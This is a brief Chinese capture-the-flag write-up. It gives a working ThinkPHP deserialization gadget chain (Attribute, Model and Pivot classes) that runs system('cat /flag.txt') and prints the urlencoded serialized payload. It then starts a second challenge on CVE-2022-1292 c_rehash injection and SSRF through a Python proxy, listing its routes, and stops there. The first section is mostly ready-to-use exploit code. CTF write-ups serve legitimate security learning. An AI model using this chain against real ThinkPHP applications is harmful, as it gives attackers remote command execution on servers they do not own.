发布时间:2024-05-02 15:01
源码泄露www.zip,用网上的链子直接打
namespace think\model\concern;
trait Attribute
{
private $data = ["key" => ["key1" => "cat /flag.txt"]];
private $withAttr = ["key"=>["key1"=>"system"]];
protected $json = ["key"];
}
namespace think;
abstract class Model
{
use model\concern\Attribute;
private $lazySave;
protected $withEvent;
private $exists;
private $force;
protected $table;
protected $jsonAssoc;
function __construct($obj = '')
{
$this->lazySave = true;
$this->withEvent = false;
$this->exists = true;
$this->force = true;
$this->table = $obj;
$this->jsonAssoc = true;
}
}
namespace think\model;
use think\Model;
class Pivot extends Model
{
}
$a = new Pivot();
$b = new Pivot($a);
echo urlencode(serialize($b));
考点:
CVE-2022-1292
SSRF
项目后端为python+go,其中python部署在外网,go通过python转发到内网
先看python,一共有四个路由:
/
为主界面
/getcrt
生成一个x509证书
/createlink
调用c_rehash创建证书链接
/proxy
通过代理访问go内网服务